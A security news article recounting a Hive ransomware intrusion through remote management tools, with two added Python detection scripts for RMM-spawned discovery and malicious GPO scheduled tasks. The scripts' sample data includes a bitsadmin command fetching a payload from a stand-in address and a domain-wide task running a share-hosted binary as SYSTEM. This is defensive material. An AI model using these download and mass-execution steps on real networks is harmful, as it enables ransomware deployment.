Tuesday, May 6, 2025

Threat Actors Actively Using Remote Management Tools to Deploy Ransomware

Threat actors have increasingly been observed relying on Remote Monitoring and Management (RMM) tools, and in this case that reliance resulted in a relatively botched Hive ransomware deployment.

The initial payload was an executable file disguised as a legitimate document.

According to Huntress, this campaign was most likely distributed by email, with a link that, when clicked, downloaded the executable.

The DFIR Report notes that the initial access method required the end user to be a local Administrator; for a less privileged user, the installation would fail.

How the Attack Was Carried Out

Around an hour after execution, the threat actor ran discovery commands through ScreenConnect, using built-in Windows tools such as systeminfo, ipconfig, and net.

After a few minutes, the threat actor executed a BITS transfer task to deploy a Cobalt Strike beacon.

After being idle for an hour, the threat actor used ScreenConnect to download an additional binary: a trojanized ApacheBench executable with Metasploit shellcode embedded in it.

When run, the shellcode opened a Meterpreter command-and-control channel. With this new channel established, the threat actor moved on to lateral movement, launching PowerShell and MSI installers for Atera and Splashtop on a server via remote services.
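As an added example (not code from the article, Huntress, or The DFIR Report), the following Python script turns the behaviours described above into detection heuristics and runs them over constructed Sysmon-style process-creation records: discovery tools with a ScreenConnect client in their process ancestry, a BITS download started from that RMM session, and msiexec installing a second RMM agent. The PIDs, file paths, the 203.0.113.10 address and the bitsadmin / Start-BitsTransfer command-line forms are assumptions; the article does not say how the BITS job was created.

```python
import ntpath
from collections import namedtuple

# Constructed Sysmon Event ID 1 style records (pid, parent pid, image path,
# command line). None of these values come from the incident in the article.
Proc = namedtuple("Proc", "pid ppid image command_line")

EVENTS = [
    Proc(4000, 600, r"C:\Program Files (x86)\ScreenConnect Client (abc123)\ScreenConnect.ClientService.exe",
         "ScreenConnect.ClientService.exe"),
    Proc(4100, 4000, r"C:\Windows\System32\cmd.exe", "cmd.exe /c systeminfo & ipconfig /all"),
    Proc(4101, 4100, r"C:\Windows\System32\systeminfo.exe", "systeminfo"),
    Proc(4102, 4100, r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
    Proc(4103, 4100, r"C:\Windows\System32\net.exe", "net group /domain"),
    Proc(4200, 4000, r"C:\Windows\System32\bitsadmin.exe",
         r"bitsadmin /transfer job1 /download /priority high http://203.0.113.10/update.bin C:\Windows\Temp\update.bin"),
    Proc(4300, 4000, r"C:\Windows\System32\msiexec.exe", r'msiexec /i "C:\Windows\Temp\AteraAgent.msi" /qn'),
    # Benign comparison: an admin running ipconfig from an Explorer-launched process.
    Proc(5000, 700, r"C:\Windows\explorer.exe", "explorer.exe"),
    Proc(5001, 5000, r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
]

# Process names taken from the article (ScreenConnect as the RMM client; systeminfo,
# ipconfig and net as discovery tools). net1.exe is the helper that net.exe spawns.
RMM_CLIENTS = {"screenconnect.clientservice.exe", "screenconnect.windowsclient.exe"}
DISCOVERY_TOOLS = {"systeminfo.exe", "ipconfig.exe", "net.exe", "net1.exe"}
# Substrings identifying installers for the second-stage RMM agents the article names.
RMM_INSTALLER_HINTS = ("atera", "splashtop")
MAX_ANCESTRY_DEPTH = 5


def basename(image):
    return ntpath.basename(image).lower()


def rmm_ancestor(proc, by_pid, max_depth=MAX_ANCESTRY_DEPTH):
    """Walk up the parent chain and return the first RMM client process, or None."""
    current = proc
    for _ in range(max_depth):
        parent = by_pid.get(current.ppid)
        if parent is None:
            return None
        if basename(parent.image) in RMM_CLIENTS:
            return parent
        current = parent
    return None


def classify(events):
    """Return (rule_name, pid) pairs for events matching the intrusion pattern."""
    by_pid = {p.pid: p for p in events}
    findings = []
    for p in events:
        name = basename(p.image)
        cmdline = p.command_line.lower()
        # A second RMM agent being installed is worth flagging wherever it runs: the
        # article reports Atera/Splashtop MSIs being pushed to a server via remote services.
        if name == "msiexec.exe" and any(h in cmdline for h in RMM_INSTALLER_HINTS):
            findings.append(("second_rmm_install", p.pid))
            continue
        if rmm_ancestor(p, by_pid) is None:
            continue  # Only discovery/download under an RMM session is interesting here.
        if name in DISCOVERY_TOOLS:
            findings.append(("rmm_discovery", p.pid))
        elif name == "bitsadmin.exe" and "/transfer" in cmdline:
            findings.append(("rmm_bits_download", p.pid))
        elif name in {"powershell.exe", "pwsh.exe"} and "start-bitstransfer" in cmdline:
            findings.append(("rmm_bits_download", p.pid))
    return findings


if __name__ == "__main__":
    for rule, pid in classify(EVENTS):
        print(f"{rule:20s} pid={pid}")
```

The ancestry walk matters because ScreenConnect does not spawn the discovery tools directly; it spawns cmd.exe, which spawns them, so a parent-only rule would miss them. The benign ipconfig run (pid 5001) has no RMM client in its chain and is not reported.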

The Execution Process

Further BITS transfers were observed creating additional Cobalt Strike footholds. The threat actor also ran a batch file that used PowerShell's built-in tooling to retrieve Active Directory data, and examined file shares and backups on the network over RDP connections.

Launching the Hive ransomware was the first step of the threat actor's final phase. They changed the administrator's password before manually running the ransomware on several important servers.

To encrypt the whole domain, the threat actor placed the ransomware binary on a network share and then created a new domain-wide GPO with a scheduled task that executed the binary on every domain-joined machine.

(Image: Deploy a Group Policy Object)

These manual ransomware runs were followed by the attempt to encrypt the entire domain.
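As an added example (not code from the article or The DFIR Report), the Python script below audits the Group Policy Preferences ScheduledTasks.xml files that a domain-wide GPO of the kind described above leaves under SYSVOL, flagging tasks that launch an executable from a network share or a user-writable directory, or that are "immediate" run-once tasks. The sample XML, the task names, the share path \\fileserver\share\svc.exe and the GPO GUID placeholder are constructed for the example; scan_sysvol() is provided for running the same audit over a real or copied SYSVOL tree.

```python
import os
import xml.etree.ElementTree as ET

# GPP writes these files at SYSVOL\<domain>\Policies\{GPO-GUID}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
TASK_TAGS = ("Task", "TaskV2", "ImmediateTask", "ImmediateTaskV2")
WRITABLE_HINTS = ("\\temp\\", "\\users\\public\\", "\\programdata\\", "\\appdata\\")

# Constructed sample modelled on the GPP ScheduledTasks.xml layout; not from the incident.
SAMPLE_XML = r"""<ScheduledTasks>
  <TaskV2 name="Inventory">
    <Properties action="C" name="Inventory" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.2">
        <Actions Context="Author">
          <Exec><Command>C:\Program Files\Inventory\inv.exe</Command><Arguments>/quiet</Arguments></Exec>
        </Actions>
      </Task>
    </Properties>
  </TaskV2>
  <ImmediateTaskV2 name="Update">
    <Properties action="C" name="Update" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.2">
        <Actions Context="Author">
          <Exec><Command>\\fileserver\share\svc.exe</Command><Arguments></Arguments></Exec>
        </Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
</ScheduledTasks>
"""


def audit_tasks_xml(xml_text, gpo_id="<unknown GPO>"):
    """Return findings for tasks that launch from a share or a user-writable
    directory, or that are immediate (run-once) tasks."""
    findings = []
    root = ET.fromstring(xml_text)
    for tag in TASK_TAGS:
        for task in root.iter(tag):
            props = task.find("Properties")
            if props is None:
                continue  # the nested <Task version="1.2"> element, not a GPP task entry
            run_as = (props.get("runAs") or "").strip()
            commands = [(e.findtext("Command") or "").strip() for e in props.iter("Exec")]
            if not commands and props.get("appName"):
                commands = [props.get("appName").strip()]  # legacy Task/ImmediateTask layout
            for cmd in commands:
                low = cmd.lower()
                reasons = []
                if low.startswith("\\\\"):
                    reasons.append("executable launched from a network share")
                if any(h in low for h in WRITABLE_HINTS):
                    reasons.append("executable in a user-writable directory")
                if tag.startswith("Immediate"):
                    reasons.append("immediate (run-once) task")
                if not reasons:
                    continue
                if run_as.lower() in ("nt authority\\system", "system"):
                    reasons.append("runs as SYSTEM")
                findings.append({"gpo": gpo_id, "task": props.get("name") or task.get("name"),
                                 "command": cmd, "reasons": reasons})
    return findings


def scan_sysvol(root_dir):
    """Walk a SYSVOL tree (or a copy) and audit every ScheduledTasks.xml found."""
    findings = []
    for dirpath, _, files in os.walk(root_dir):
        for fn in files:
            if fn.lower() != "scheduledtasks.xml":
                continue
            gpo_id = next((p for p in dirpath.split(os.sep) if p.startswith("{")), "<unknown GPO>")
            with open(os.path.join(dirpath, fn), encoding="utf-8-sig") as fh:
                findings.extend(audit_tasks_xml(fh.read(), gpo_id))
    return findings


if __name__ == "__main__":
    for f in audit_tasks_xml(SAMPLE_XML, "{constructed-gpo-guid}"):
        print(f["gpo"], f["task"], f["command"], "; ".join(f["reasons"]))
```

The benign Inventory task runs as SYSTEM too, but is not reported because running as SYSTEM alone is common for legitimate tasks; it is only appended as context once a task has already been flagged for its launch location or run-once nature.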

Researchers put the time to ransomware (TTR) from initial access at 61 hours. During the attack, the threat actor deleted forensically useful artifacts to hide their presence. According to the research, the attackers relied on remote services for lateral movement.

Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.